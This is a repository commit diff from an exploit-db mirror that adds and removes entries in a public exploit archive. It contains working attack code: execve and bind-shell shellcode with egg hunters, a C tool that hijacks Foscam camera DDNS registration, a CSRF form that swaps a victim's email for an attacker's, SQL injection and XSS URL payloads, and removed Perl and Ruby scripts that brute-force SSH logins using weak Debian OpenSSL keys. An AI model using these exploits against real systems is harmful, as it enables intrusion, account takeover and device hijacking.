bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-01-09

Browse source 
10 new exploits
This commit is contained in:
Offensive Security 2016-01-09 05:02:44 +00:00
parent 97940c47e2
commit 86d0c5fe16
15 changed files with 781 additions and 376 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -5246,7 +5246,7 @@ id,file,description,date,author,platform,type,port
5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0
5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0
5622,platforms/multiple/remote/5622.txt,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",multiple,remote,22
5622,platforms/linux/remote/5622.txt,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript SQL Injection Vulnerabilities",2008-05-15,"Virangar Security",php,webapps,0
5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 (rfi/rfd/sql/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0
5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0
@ -5256,7 +5256,7 @@ id,file,description,date,author,platform,type,port
5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 - Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0
5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0
5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,multiple,remote,22
5632,platforms/linux/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0
5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0
5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0
@ -35408,6 +35408,7 @@ id,file,description,date,author,platform,type,port
39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0
39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 execve _/bin/sh_ - shellcode 24 byte",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2016-01-04,"Avinash Thapa",windows,remote,0
39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
@ -35441,3 +35442,12 @@ id,file,description,date,author,platform,type,port
39192,platforms/hardware/webapps/39192.rb,"D-Link DCS-931L File Upload",2016-01-07,metasploit,hardware,webapps,0
39193,platforms/java/webapps/39193.txt,"OpenMRS Reporting Module 0.9.7 - Remote Code Execution",2016-01-07,"Brian D. Hysell",java,webapps,0
39194,platforms/hardware/webapps/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,webapps,0
39195,platforms/hardware/remote/39195.c,"Foscam IP Camera Predictable Credentials Security Bypass Vulnerability",2014-05-08,"Sergey Shekyan",hardware,remote,0
39196,platforms/linux/remote/39196.py,"Apache 'mod_wsgi' Module Information Disclosure Vulnerability",2014-05-21,"Buck Golemon",linux,remote,0
39197,platforms/php/webapps/39197.txt,"WordPress Booking System (Booking Calendar) Plugin 'booking_form_id' SQL Injection Vulnerability",2014-05-21,maodun,php,webapps,0
39198,platforms/php/webapps/39198.html,"User Cake Cross Site Request Forgery Vulnerability",2014-05-25,"Dolev Farhi",php,webapps,0
39199,platforms/python/webapps/39199.html,"Pyplate 'addScript.py' Cross Site Request Forgery Vulnerability",2014-05-23,"Henri Salo",python,webapps,0
39200,platforms/php/webapps/39200.txt,"PHP-Nuke 'Submit_News' Component SQL Injection Vulnerability",2014-05-24,"ali ahmady",php,webapps,0
39202,platforms/php/webapps/39202.txt,"WP Symposium Pro Social Network Plugin 15.12 - Multiple Vulnerabilities",2016-01-08,"Rahul Pratap Singh",php,webapps,0
39203,platforms/lin_x86-64/shellcode/39203.c,"x86_64 Linux Egghunter - 18 bytes",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0
39204,platforms/lin_x86/shellcode/39204.c,"Linux x86 - Egg-hunter (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0

Can't render this file because it is too large.

9
platforms/cgi/webapps/25622.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/13522/info
MegaBook is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
This issue is reported to affect MegaBook version 2.0; other versions may also be vulnerable.
http://www.example.com/admin.cgi?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt;

363
platforms/hardware/remote/39195.c Executable file
View file

@ -0,0 +1,363 @@
source: http://www.securityfocus.com/bid/67510/info
Foscam IP Camera is prone to a security-bypass vulnerability.
An attacker can exploit this issue to gain access to sensitive information and perform certain unauthorized actions; this may lead to further attacks.
Foscam IP Camera 11.37.2.49 and prior versions are vulnerable.
/*
* Copyright 2013 Artem Harutyunyan, Sergey Shekyan
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
#include <string.h>
#include <getopt.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/errno.h>
#include <arpa/inet.h>
#include <netdb.h>
#include "camtool.h"
#define IP_BUF_LEN 16
#define RESP_BUF_LEN 1024
#define PORT_BUF_LEN 6
#define UNAME_LEN 6
#define DELIM 0x1
#define REQ_POS_PID 1
#define REQ_POS_UNAME 2
#define REQ_POS_PWD 3
#define REQ_POS_OEM 4
#define REQ_POS_DOMAIN_COUNT 5
#define REQ_POS_DOMAIN_0 6
#define RES_POS_PID 1
#define RES_POS_ERROR 2
#define RES_POS_MSG 3
#define RES_POS_DOMAIN_COUNT 4
#define RES_POS_DOMAIN_0 5
#define RES_ENT_SRV_COUNT 6
#define RES_ENT_SRV_0 7
#define RES_ENT_SRV_MPORT_0 8
#define RES_ENT_SRV_APORT_0 9
#define KEY_PID "PID"
#define KEY_UNAME "UName"
#define KEY_PWD "PWD"
#define KEY_OEM "OEM"
#define KEY_DOMAIN_COUNT "DomainCount"
#define KEY_DOMAIN_0 "Domain0"
#define KEY_ENT_SRV_0 "EntServer0"
#define KEY_ENT_SRV_MPORT_0 "EntServerMPort0"
static char initial_payload[] = {
0x01, 0x50, 0x49, 0x44, 0x3d, 0x31, 0x34, 0x01, 0x55, 0x4e, 0x61, 0x6d,
0x65, 0x3d, 0x63, 0x68, 0x31, 0x32, 0x36, 0x36, 0x01, 0x50, 0x57, 0x44,
0x3d, 0x63, 0x68, 0x31, 0x32, 0x36, 0x36, 0x01, 0x4f, 0x45, 0x4d, 0x3d,
0x72, 0x65, 0x65, 0x63, 0x61, 0x6d, 0x01, 0x44, 0x6f, 0x6d, 0x61, 0x69,
0x6e, 0x43, 0x6f, 0x75, 0x6e, 0x74, 0x3d, 0x31, 0x01, 0x44, 0x6f, 0x6d,
0x61, 0x69, 0x6e, 0x30, 0x3d, 0x63, 0x68, 0x31, 0x32, 0x36, 0x36, 0x2e,
0x6d, 0x79, 0x66, 0x6f, 0x73, 0x63, 0x61, 0x6d, 0x2e, 0x6f, 0x72, 0x67,
0x01, 0x00
};
static const unsigned int n_initial_payload = 85;
static char redirect_payload[] = {
0x01, 0x50, 0x49, 0x44, 0x3d, 0x31, 0x30, 0x01, 0x55, 0x4e, 0x61, 0x6d,
0x65, 0x3d, 0x63, 0x68, 0x31, 0x32, 0x36, 0x36, 0x01, 0x50, 0x57, 0x44,
0x3d, 0x63, 0x68, 0x31, 0x32, 0x36, 0x36, 0x01, 0x4f, 0x45, 0x4d, 0x3d,
0x72, 0x65, 0x65, 0x63, 0x61, 0x6d, 0x01, 0x4f, 0x53, 0x3d, 0x4c, 0x69,
0x6e, 0x75, 0x78, 0x01, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x4e, 0x4f, 0x3d,
0x31, 0x33, 0x38, 0x30, 0x01, 0x44, 0x6f, 0x6d, 0x61, 0x69, 0x6e, 0x30,
0x3d, 0x63, 0x68, 0x31, 0x32, 0x36, 0x36, 0x2e, 0x6d, 0x79, 0x66, 0x6f,
0x73, 0x63, 0x61, 0x6d, 0x2e, 0x6f, 0x72, 0x67, 0x01, 0x0
};
static const unsigned int n_redirect_payload = 93;
static int
payload_get_offset_by_name(const char* name, const char buf[0], const unsigned int n_buf)
{
const unsigned int n_name = strlen(name);
unsigned int i_name = 0;
unsigned int i = 0;
while (i < n_buf) {
while (name[i_name] == buf[i + i_name] && ((i + i_name) < n_buf) && (i_name < n_name))
++i_name;
if (i_name == n_name)
return i;
else
i_name = 0;
++i;
}
return -1;
}
static int
payload_insert_host(const char* host, const char* buf, const unsigned int n_buf)
{
unsigned int i = 0;
unsigned int n_host = strlen(host);
int offset = 0;
// Make sure that hostname is exactly UNAME_LEN
while (i < n_host && (buf[++i] != DELIM)) {}
if (i != (UNAME_LEN + 1)) return -1;
// Insert hostname to payload
if ((offset = payload_get_offset_by_name(KEY_UNAME, buf, n_buf)) == -1) return 1;
memmove((void*) &buf[offset + strlen(KEY_UNAME) + 1], (const void*) host, UNAME_LEN);
// Insert pwd to payload
if ((offset = payload_get_offset_by_name(KEY_PWD, buf, n_buf)) == -1) return 1;
memmove((void*) &buf[offset + strlen(KEY_PWD) + 1], (const void*) host, UNAME_LEN);
// Insert domain to payload
if ((offset = payload_get_offset_by_name(KEY_DOMAIN_0, buf, n_buf)) == -1 || (offset + n_host) >= n_buf) return 1;
memmove((void*) &buf[offset + strlen(KEY_DOMAIN_0) + 1], (const void*) host, n_host);
return 0;
}
static int
payload_extract_ent_srv_0(const char** ip, unsigned int* n_ip, const char* payload, const unsigned int n_payload)
{
unsigned int offset = payload_get_offset_by_name(KEY_ENT_SRV_0, payload, n_payload);
const unsigned int n_key_ent_srv = strlen(KEY_ENT_SRV_0);
if (memcmp(&payload[offset], KEY_ENT_SRV_0, n_key_ent_srv) != 0)
return 1;
offset += (n_key_ent_srv + 1); // +1 for '='
unsigned int ip_offset = offset;
while (offset < n_payload && payload[offset] != DELIM)
++offset;
if (offset == n_payload)
return 1;
*ip = &payload[ip_offset];
*n_ip = offset - ip_offset;
return 0;
}
static int
payload_extract_ent_srv_port(const char** port_fwd, unsigned int* n_port_fwd, const char* payload, const unsigned int
n_payload)
{
unsigned int offset = payload_get_offset_by_name(KEY_ENT_SRV_MPORT_0, payload, n_payload);
const unsigned int n_key_ent_srv_mport = strlen(KEY_ENT_SRV_MPORT_0);
if (memcmp(&payload[offset], KEY_ENT_SRV_MPORT_0, n_key_ent_srv_mport) != 0)
return 1;
offset += (n_key_ent_srv_mport + 1); // +1 for '='
unsigned int mport_offset = offset;
while (offset < n_payload && payload[offset] != DELIM)
++offset;
if (offset == n_payload)
return 1;
*port_fwd = &payload[mport_offset];
*n_port_fwd = offset - mport_offset;
return 0;
}
static int
send_udp_payload (const char* payload, const unsigned int n_payload, const char* host, const unsigned short port,
int* sockfd, struct addrinfo** r)
{
/* Create socket and get the data from DDNS server */
struct addrinfo hints = {0};
struct addrinfo* res = *r;
int ret = 0;
int nbytes = 0;
hints.ai_family = AF_INET;
hints.ai_socktype = SOCK_DGRAM;
if ((ret = getaddrinfo(host, NULL, &hints, &res)) != 0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(ret));
return 1;
}
if ((*sockfd = socket(res->ai_family, res->ai_socktype, res->ai_protocol)) == -1) {
fprintf(stderr, "socket() failed: %s\n", strerror(errno));
return 1;
}
struct sockaddr_in *ipv4 = (struct sockaddr_in*) res->ai_addr;
ipv4->sin_port = htons(port);
/* Send the request */
if ((nbytes = sendto(*sockfd, payload, n_payload, 0, res->ai_addr, sizeof *(res->ai_addr))) != n_payload) {
fprintf(stderr, "sendto() failed: %s\n", strerror(errno));
return 1;
}
*r = res;
return 0;
}
static void
usage()
{
fprintf(stdout,
"Tool for packing WebUI firmware.\n"
"Usage: uipack -d <dir> -o <output file>\n"
"\t-s DDNS server name\n"
"\t-a camera hostname\n"
"\t-i IP address to register\n"
"\t-h print this message\n");
}
int
main( int argc, char** argv)
{
if (argc < 4) {
usage();
return 1;
}
char ddns[MAX_HOSTNAME_LEN] = {0};
char camera_name[MAX_HOSTNAME_LEN] = {0};
char ip[IP_BUF_LEN] = {0};
char o = 0;
while ((o = getopt(argc, argv, ":s:a:i:h")) != -1) {
switch(o) {
case 's':
if (strlen(optarg) > MAX_HOSTNAME_LEN - 1) {
fprintf(stderr, "%s can not be longer than %d\n", optarg, MAX_HOSTNAME_LEN - 1);
return 1;
}
strncpy(ddns, optarg, MAX_HOSTNAME_LEN);
break;
case 'a':
if (strlen(optarg) > MAX_HOSTNAME_LEN - 1) {
fprintf(stderr, "%s can not be longer than %d\n", optarg, MAX_HOSTNAME_LEN - 1);
return 1;
}
strncpy(camera_name, optarg, MAX_HOSTNAME_LEN);
break;
case 'i':
if (strlen(optarg) > IP_BUF_LEN - 1) {
fprintf(stderr, "%s can not be longer than %d\n", optarg, IP_BUF_LEN - 1);
return 1;
}
strncpy(ip, optarg, IP_BUF_LEN);
break;
case 'h':
usage();
return 0;
case '?':
fprintf(stderr, "Illegal option -%c\n", optopt);
usage();
return 1;
defalt:
fprintf(stderr, "Option -%c requires an argument.\n", optopt);
usage();
return 1;
}
}
if (strlen(ddns) == 0|| strlen(camera_name) == 0 || strlen(ip) == 0) {
usage();
return 1;
}
/* Insert hostname into payload */
if (payload_insert_host(camera_name, initial_payload, n_initial_payload) != 0) {
fprintf(stderr, "Could not insert hostname into the payload");
return 1;
}
/* Send payload to DDNS */
int sockfd = 0;
struct addrinfo* res = NULL;
if (send_udp_payload (initial_payload, n_initial_payload, ddns, 8080, &sockfd, &res) != 0) {
fprintf(stderr, "Could not send UDP payload to %s", ddns);
return 1;
}
/* Get the response */
char resp[RESP_BUF_LEN] = {0};
int n_resp;
unsigned int fromlen = sizeof *(res->ai_addr);
if ((n_resp = recvfrom(sockfd, resp, RESP_BUF_LEN, 0, res->ai_addr, &fromlen)) == -1) {
fprintf(stderr, "recvfrom() failed: %s\n", strerror(errno));
return 1;
}
fprintf(stderr, "Got %d bytes\n", n_resp);
freeaddrinfo(res);
/* Make sure it's a redirect */
/* Extract the server name */
const char* ip_fwd = NULL;
unsigned int n_ip_fwd = 0;;
char str_ip_fwd[IP_BUF_LEN] = {0};
if (payload_extract_ent_srv_0(&ip_fwd, &n_ip_fwd, resp, n_resp) != 0) {
fprintf(stderr, "Could not extract IP server from the response\n");
return 1;
}
memmove(str_ip_fwd, ip_fwd, n_ip_fwd);
fprintf(stderr, "IP of the redirect server is: %s\n", str_ip_fwd);
/* Extract port */
const char* port_fwd = 0;
unsigned int n_port_fwd = 0;
char str_port_fwd[PORT_BUF_LEN] = {0};
if (payload_extract_ent_srv_port(&port_fwd, &n_port_fwd, resp, n_resp) != 0) {
fprintf(stderr, "Could not extract port from the response\n");
return 1;
}
memmove(str_port_fwd, port_fwd, n_port_fwd);
fprintf(stderr, "Port of the redirect server is: %s\n", str_port_fwd);
/* Update redirect payload and send to DDNS */
if (payload_insert_host(camera_name, redirect_payload, n_redirect_payload) != 0) {
fprintf(stderr, "Could not insert hostname into the redirect payload");
return 1;
}
sockfd = 0;
res = NULL;
if (send_udp_payload(redirect_payload, n_redirect_payload, str_ip_fwd, atoi(str_port_fwd), &sockfd, &res) != 0) {
fprintf(stderr, "Could not send UDP payload to %s", str_ip_fwd);
return 1;
}
return 0;
}

50
platforms/lin_x86-64/shellcode/39203.c Executable file
View file

@ -0,0 +1,50 @@
/*---------------------------------------------------------------------------------------------------------------------
/*
*Title: x86_64 Linux egghunter in 18 bytes
*Author: Sathish kumar
*Contact: https://www.linkedin.com/in/sathish94
*Description: x86_64 linux egghunter which searches for the marker.
*Copyright: (c) 2016 iQube. (http://iQube.io)
*Release Date: January 7, 2016
*Tested On: Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run: gcc -fno-stack-protector -z execstack egghunter.c -o egghunter
*
*Nasm source:
*
*
global _start
_start:
egg:
inc rdx ; Address
push rdx ; pushing the value in the rdx to the stack
pop rdi ; sending rdx to rdi via stack
push 0x50905090 ; pusing the egg marker into the stack
pop rax
inc eax ; Real egg marker is 0x50905091 so the the eax register is increased bcz the marker shouldn't be hardcoded
scasd ; check if we have found the egg
jnz egg ; try the next byte in the memory
jmp rdi ; go to the shellcode
*Compile & Run: nasm -f elf64 -o egghunter.o egghunter.nasm
ld -o egghunter egghunter.o
*/
#include <stdio.h>
#include <string.h>
char hunter[] = \
"\x48\xff\xc2\x52\x5f\x68\x90\x50\x90\x50\x58\xff\xc0\xaf\x75\xf0\xff\xe7";
char execve_code_with_egg[] = \
//marker
"\x91\x50\x90\x50"
"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
int main(){
printf("Egg Hunter Length: %d\n", (int)strlen(hunter));
(*(void (*)()) hunter)();
return 0;
}

78
platforms/lin_x86/shellcode/39160.c Executable file
View file

@ -0,0 +1,78 @@
/*
; Title: Linux/x86 execve "/bin/sh" - shellcode 24 byte
; Platform: linux/x86
; Date: 2015-01-03
; Author: Dennis 'dhn' Herrmann
; Website: https://zer0-day.pw
BITS 32
global _start
section .text
; syscalls kernel
SYS_EXECVE equ 0x0b
_start:
; execve("/bin//sh", 0, 0);
push SYS_EXECVE ; SYS_EXECVE = 11
pop eax ; set SYS_EXECVE to eax
xor esi, esi ; clean esi
push esi ; esi is zero
push 0x68732f2f ; push 'hs//'
push 0x6e69622f ; push 'nib/'
; execve("/bin//sh/", 0, 0);
; ^
; |
; ebx
mov ebx, esp
; execve("/bin//sh/", 0, 0);
; ^
; |
; ecx
xor ecx, ecx ; clean ecx
; execve("/bin//sh/", 0, 0);
; ^
; |
; edx
mov edx, ecx ; set zero to edx
int 0x80 ; syscall execve
*/
/*
* $ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
* $ ./shellcode
* Shellcode Length: 24
* # id
* uid=0(root) gid=0(root) groups=0(root)
*/
#include <stdio.h>
#include <string.h>
char shellcode[] = {
"\x6a\x0b" /* push 0xb */
"\x58" /* pop eax */
"\x31\xf6" /* xor esi,esi */
"\x56" /* push esi */
"\x68\x2f\x2f\x73\x68" /* push 0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push 0x6e69622f */
"\x89\xe3" /* mov ebx,esp */
"\x31\xc9" /* xor ecx,ecx */
"\x89\xca" /* mov edx,ecx */
"\xcd\x80" /* int 0x80 */
};
int main()
{
printf("Shellcode Length: %d\n", (int)strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
return 0;
}

84
platforms/lin_x86/shellcode/39204.c Executable file
View file

@ -0,0 +1,84 @@
/*
* Title: Egg Hunter PoC
* Platform: linux/x86
* Date: 2015-01-07
* Author: Dennis 'dhn' Herrmann
* Website: https://zer0-day.pw
* Github: https://github.com/dhn/SLAE/
* SLAE-721
*/
/*
* egg_hunter.nasm
* ---------------
* BITS 32
*
* global _start
* section .text
*
* EGG_SIG equ 0x4f904790 ; signature
*
* _start:
* cdq ; zero out edx
* mov edx, EGG_SIG ; edx = 0x4f904790
*
* search_the_egg:
* inc eax ; increment eax
* cmp DWORD [eax], edx ; compare eax with the EGG_SIG
* jne search_the_egg ; if not compare jump to search_the_egg
*
* jmp eax ; jump to eax
*
*/
#include <stdio.h>
#include <string.h>
/*
* Egg Signature:
*
* 0x4f 0x90 0x47 0x90
* | | | |
* dec edi - NOP - inc edi - NOP
*/
#define EGG_SIG "\x90\x47\x90\x4f"
unsigned char egg_hunter[] = \
"\x99" /* cdq */
"\xba\x90\x47\x90\x4f" /* mov edx, 0x4f904790 */
"\x40" /* inc eax */
"\x39\x10" /* cmp DWORD PTR [eax], edx */
"\x75\xfb" /* jne 6 <search_the_egg> */
"\xff\xe0"; /* jmp eax */
/*
* Bind Shell TCP shellcode - 96 byte
* bind to port: 1337
*/
unsigned char shellcode[] = \
EGG_SIG /* Egg Signature */
"\x6a\x66\x58\x6a\x01\x5b\x31\xf6"
"\x56\x6a\x01\x6a\x02\x89\xe1\xcd"
"\x80\x5f\x97\x93\xb0\x66\x56\x66"
"\x68\x05\x39\x66\x6a\x02\x89\xe1"
"\x6a\x10\x51\x57\x89\xe1\xcd\x80"
"\xb0\x66\xb3\x04\x56\x57\x89\xe1"
"\xcd\x80\xb0\x66\xb3\x05\x56\x56"
"\x57\x89\xe1\xcd\x80\x93\x31\xc9"
"\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80"
"\x75\xf8\x6a\x0b\x58\x31\xc9\x51"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x89\xca\xcd\x80";
/*
* $ gcc -Wl,-z,execstack -fno-stack-protector PoC.c -o PoC
* [+] Egg Hunter Length: 13
* [+] Shellcode Length + 4 byte egg: 100
*
*/
void main()
{
printf("[+] Egg Hunter Length: %d\n", strlen(egg_hunter));
printf("[+] Shellcode Length + 4 byte egg: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())egg_hunter;
ret();
}

49
platforms/linux/remote/39196.py Executable file
View file

@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/67534/info
mod_wsgi is prone to a remote information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
import functools
import threading
import time
import random
def run(*args):
while True:
items = []
for i in range(1000):
items.append((int(random.random()*20)*'X'))
time.sleep(0.00001)
thread = threading.Thread(target=run)
thread.start()
def headers():
return [('Content-Type', 'text/plain'.upper().lower())]
def response():
yield 'Hello World!\n'
_content_type_cache = {}
def intern_content_type(application):
@functools.wraps(application)
def _wrapper(environ, start_response):
def _start_response(status, headers, *args):
_headers = []
for header, value in headers:
if header.lower() == 'content-type':
value = _content_type_cache.setdefault(value, value)
_headers.append((header, value))
return start_response(status, _headers, *args)
return application(environ, _start_response)
return _wrapper
#@intern_content_type
def application(environ, start_response):
status = '200 OK'
start_response(status, headers())
return response()

53
platforms/multiple/remote/5622.txt
View file

@ -1,53 +0,0 @@
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.
This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.
On an unpatched system, which doesn't need to be debian, do the following:
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)
4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By mm@deadbeef.de\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
mm@deadbeef.de
# milw0rm.com [2008-05-15]

78
platforms/multiple/remote/5632.rb
View file

@ -1,78 +0,0 @@
#!/usr/bin/ruby
#
# Debian SSH Key Tester
# L4teral <l4teral [at] gmail com>
#
# This tool helps to find user accounts with weak SSH keys
# that should be regenerated with an unaffected version
# of openssl.
#
# You will need the precalculated keys provided by HD Moore
# See http://metasploit.com/users/hdm/tools/debian-openssl/
# for further information.
#
# Common Keys:
#
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2)
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
#
#
# Usage:
# debian_openssh_key_test.rb <host> <user> <keydir>
#
require 'thread'
THREADCOUNT = 10
KEYSPERCONNECT = 3
queue = Queue.new
threads = []
keyfiles = []
host = ARGV.shift or raise "no host given!"
user = ARGV.shift or raise "no user given!"
keysdir = ARGV.shift or raise "no key dir given!"
Dir.new(keysdir).each do |f|
if f =~ /\d+$/ then
keyfiles << f
queue << f
end
end
totalkeys = queue.length
currentkey = 1
THREADCOUNT.times do |i|
threads << Thread.new(i) do |j|
while !queue.empty?
keys = []
KEYSPERCONNECT.times { keys << queue.pop unless queue.empty? }
keys.map! { |f| f = File.join(keysdir, f) }
keys.each do |k|
puts "testing key #{currentkey}/#{totalkeys} #{k}..."
currentkey += 1
end
system "ssh -l #{user} -o PasswordAuthentication=no -i #{keys.join(" -i ")} #{host} \"exit\" &>/dev/null"
if $? == 0 then
keys.each do |k|
system "ssh -l #{user} -o PasswordAuthentication=no -i #{k} #{host} \"exit\" &>/dev/null"
if $? == 0 then
puts "KEYFILE FOUND: \n#{k}"
exit
end
end
end
end
end
end
trap("SIGINT") do
threads.each { |t| t.exit() }
exit
end
threads.each { |t| t.join }
# milw0rm.com [2008-05-16]

9
platforms/php/webapps/39197.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/67535/info
Search Everything plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Booking System (Booking Calendar) 1.3 are vulnerable.
www.example.com/wp/wp-admin/admin-ajax.php?action=dopbs_show_booking_form_fields&booking_form_id=[SQLi]

37
platforms/php/webapps/39198.html Executable file
View file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/67604/info
User Cake is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.
An attacker can exploit this issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
User Cake 2.0.2 is vulnerable; prior versions may also be affected.
<html>
<! -- CSRF Example for userCake -->
<div align="center">
<pre>
<h2><b> userCake CSRF Proof of concept <b></h2>
<h4> Prerequisite: Make sure the user is logged in to the forum before submitting </h4>
<body>
<form
action="http://usercake.com/user_settings.php"
method="POST">
Enter <u>CSRFTest</u> user account password to continue...
Username: <b>CSRFTest</b>
Password: <input type="password" name="password" size="10" required>
<input type="hidden" name="email" value="attacker@email.com" />
<input type="hidden" name="passwordc" value="HelloWorld" />
<input type="hidden" name="passwordcheck" value="HelloWorld" />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</div>
</html>

9
platforms/php/webapps/39200.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/67656/info
PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP-Nuke 8.3 is vulnerable; other versions may also be affected.
http://www.example.com/modules.php?name=Submit_News&subject=whatever&topics[]=[SQLi]

65
